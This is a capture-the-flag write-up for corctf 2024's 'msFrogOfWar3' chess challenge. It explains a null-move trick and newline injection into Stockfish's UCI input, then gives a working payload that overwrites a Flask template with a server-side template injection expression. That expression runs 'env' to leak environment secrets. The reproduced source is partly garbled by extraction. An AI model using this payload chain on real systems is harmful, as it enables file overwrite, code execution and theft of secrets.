msFrogOfWar3 corctf2024
431 points - 4 solves - First Blood!
Author: strellic, quintec
Writeup co-authored by ky28059
Challenge Description:
We’re given a Flask server that looks like this:
from flask import Flask, request, render_template
from flask_socketio import SocketIO, emit
from stockfish import Stockfish
import random
import chess
from stockfish import Stockfish
games = {}
toxic_msges = [
"rip bozo",
"so bad lmfaoo",
"skill issue",
"mad cuz bad",
"hold this L",
"L + ratio + you fell off",
"i bet your main category is stego",
"have you tried alt+f4?",
win_msges = [
"lmaooooooooo ur so bad",
"was that it?",
"hopefully the next game wont be so quick",
"nice try - jk that was horrible",
"this aint checkers man"
FLAG = "corctf{this_is_a_fake_flag}"
class GameWrapper:
def __init__(self, emit):
self.emit = emit
self.board = chess.Board(chess.STARTING_FEN)
self.moves = []
self.player_turn = True
def get_player_state(self):
legal_moves = [f"{m}" for m in self.board.legal_moves] if self.player_turn and self.board.fullmove_number < TURN_LIMIT else []
status = "running"
if self.board.fullmove_number >= TURN_LIMIT:
status = "turn limit"
if outcome := self.board.outcome():
if outcome.winner is None:
status = "draw"
status = "win" if outcome.winner == chess.WHITE else "lose"
return {
"pos": self.board.fen(),
"moves": legal_moves,
"your_turn": self.player_turn,
"status": status,
"turn_counter": f"{self.board.fullmove_number} / {TURN_LIMIT} turns"
def play_move(self, uci):
if not self.player_turn:
if self.board.fullmove_number >= TURN_LIMIT:
self.player_turn = False
outcome = self.board.outcome()
if outcome is None:
move = chess.Move.from_uci(uci)
if move:
if move not in self.board.legal_moves:
self.player_turn = True
self.emit('state', self.get_player_state())
self.emit("chat", {"name": "System", "msg": "Illegal move"})
self.player_turn = True
self.emit('state', self.get_player_state())
self.emit("chat", {"name": "System", "msg": "Invalid move format"})
elif outcome.winner != chess.WHITE:
self.emit("chat", {"name": "🐸", "msg": "you lost, bozo"})
# stockfish has a habit of crashing
# The following section is used to try to resolve this
opponent_move, attempts = None, 0
while not opponent_move and attempts <= 10:
attempts += 1
engine = Stockfish("./stockfish/stockfish-ubuntu-x86-64-avx2", parameters={"Threads": 4}, depth=STOCKFISH_DEPTH)
for m in self.moves:
if engine.is_move_correct(m):
opponent_move = engine.get_best_move_time(3_000)
if opponent_move != None:
opponent_move = chess.Move.from_uci(opponent_move)
if self.board.is_capture(opponent_move):
self.emit("chat", {"name": "🐸", "msg": random.choice(toxic_msges)})
self.player_turn = True
self.emit("state", self.get_player_state())
if (outcome := self.board.outcome()) is not None:
if outcome.termination == chess.Termination.CHECKMATE:
if outcome.winner == chess.BLACK:
self.emit("chat", {"name": "🐸", "msg": "Nice try... but not good enough 🐸"})
self.emit("chat", {"name": "🐸", "msg": "how??????"})
self.emit("chat", {"name": "System", "msg": FLAG})
else: # statemate, insufficient material, etc
self.emit("chat", {"name": "🐸", "msg": "That was close... but still not good enough 🐸"})
self.emit("chat", {"name": "System", "msg": "An error occurred, please restart"})
app = Flask(__name__, static_url_path='', static_folder='static')
socketio = SocketIO(app, cors_allowed_origins='*')
def add_header(response):
response.headers['Cache-Control'] = 'max-age=604800'
return response
def index_route():
return render_template('index.html')
def on_connect(_):
games[request.sid] = GameWrapper(emit)
emit('state', games[request.sid].get_player_state())
def on_disconnect():
if request.sid in games:
del games[request.sid]
def onmsg_move(move):
emit("chat", {"name": "System", "msg": "An error occurred, please restart"})
def onmsg_state():
emit('state', games[request.sid].get_player_state())
At first glance, it looks like we need to win against Stockfish in 15 moves to get the flag.
Obviously, winning against max-difficulty Stockfish, much less in 15 moves, is impossible. Curiously, however, the server uses python-chess’s Move
class to verify game inputs. Reading the source for Move.from_uci
def from_uci(cls, uci: str) -> Move:
Parses a UCI string.
:raises: :exc:`InvalidMoveError` if the UCI string is invalid.
if uci == "0000":
return cls.null()
elif len(uci) == 4 and "@" == uci[1]:
drop = PIECE_SYMBOLS.index(uci[0].lower())
square = SQUARE_NAMES.index(uci[2:])
except ValueError:
raise InvalidMoveError(f"invalid uci: {uci!r}")
return cls(square, square, drop=drop)
elif 4 <= len(uci) <= 5:
from_square = SQUARE_NAMES.index(uci[0:2])
to_square = SQUARE_NAMES.index(uci[2:4])
promotion = PIECE_SYMBOLS.index(uci[4]) if len(uci) == 5 else None
except ValueError:
raise InvalidMoveError(f"invalid uci: {uci!r}")
if from_square == to_square:
raise InvalidMoveError(f"invalid uci (use 0000 for null moves): {uci!r}")
return cls(from_square, to_square, promotion=promotion)
raise InvalidMoveError(f"expected uci string to be of length 4 or 5: {uci!r}")
we can send a “null move” 0000
to pass the turn to Stockfish. Afterwards, Stockfish will play white and we will play black; all we need to do is get checkmated to “win”!
socket.emit('move', '0000')
socket.emit('move', 'f7f6')
socket.emit('move', 'g7g5')
Unfortunately, winning is only part one of the challenge; the flag printed to the chat is fake, and looking in
, the real flag lies in the FLAG
environment variable passed to docker run
docker build . -t msfrogofwar3
docker run --rm -it -p 8080:8080 -e FLAG=corctf{real_flag} --name msfrogofwar3 msfrogofwar3
However, looking again at the play_move
method in the game server,
outcome = self.board.outcome()
if outcome is None:
move = chess.Move.from_uci(uci)
if move:
if move not in self.board.legal_moves:
self.player_turn = True
self.emit('state', self.get_player_state())
self.emit("chat", {"name": "System", "msg": "Illegal move"})
self.player_turn = True
self.emit('state', self.get_player_state())
self.emit("chat", {"name": "System", "msg": "Invalid move format"})
elif outcome.winner != chess.WHITE:
self.emit("chat", {"name": "🐸", "msg": "you lost, bozo"})
it looks like winning lets us push unchecked moves to self.moves
, which then get passed to engine.is_move_correct
while not opponent_move and attempts <= 10:
attempts += 1
engine = Stockfish("./stockfish/stockfish-ubuntu-x86-64-avx2", parameters={"Threads": 4}, depth=STOCKFISH_DEPTH)
for m in self.moves:
if engine.is_move_correct(m):
opponent_move = engine.get_best_move_time(3_000)
The server uses the stockfish python library, which uses a subprocess to launch and communicate with the Stockfish engine.
self._stockfish = subprocess.Popen(
Reading the stockfish library source code for is_move_correct
def is_move_correct(self, move_value: str) -> bool:
"""Checks new move.
New move value in algebraic notation.
True, if new move is correct, else False.
old_self_info =
self._put(f"go depth 1 searchmoves {move_value}")
is_move_correct = self._get_best_move_from_sf_popen_process() is not None = old_self_info
return is_move_correct
def _put(self, command: str) -> None:
if not self._stockfish.stdin:
raise BrokenPipeError()
if self._stockfish.poll() is None and not self._has_quit_command_been_sent:
if command == "quit":
self._has_quit_command_been_sent = True
Therefore, by circumventing the move checking, we can control move_value
and send arbitrary commands to the Stockfish process.
Stockfish documents its supported UCI commands and functionality here. Of particular note is
setoption name Debug Log File value [file path]
which causes Stockfish to log all incoming and outbound interactions to the specified file path. We can get a simple proof-of-concept attack by making Stockfish log to the configured Flask static dir:
Putting it all together
We now have the ability to write to any file and possibly overwrite the contents of that file.
The source code gives hint to a vulnerable file.
def index_route():
return render_template('index.html')
By writing to /app/templates/index.html
we can get flask to render whatever was in the debug log file as a template.
Anything between {{
and }}
will be evaluated as a template expression.
Flask caches templates, so we would want to start a new instance of the flask application, and not view the webpage just yet.
After starting an instance we can send our moves to the server manually using a common flask ssti payload to run shell commands.
const socket = io(""/);
socket.emit('move', '0000')
socket.emit('move', 'f7f6')
socket.emit('move', 'g7g5')
socket.emit('move', "e6e7\nsetoption name Debug Log File value /app/templates/index.html\n{{ ''.__class__.mro()[1].__subclasses__()[568]('env', shell=True, stdout=-1).communicate() }}\n")
Ensure you do not open the webpage until you have sent the payload, as the template will be cached and our custom debug log template will never be rendered.
Ensure you do not open the webpage until you have sent the payload, as the template will be cached and our custom debug log template will never be rendered.
This replaces the index.html template with the output of the command env
. We can now view the webpage to see the output of the command giving us the flag.
corctf{“Whatever you do, don’t reveal all your techniques in a CTF challenge, you fool, you moron.” - Sun Tzu, The Art of War}
Overall this challenge only got four solves making it one of the harder..? challenges, and definitely one of the most unique. We got first blood after over 24 hours!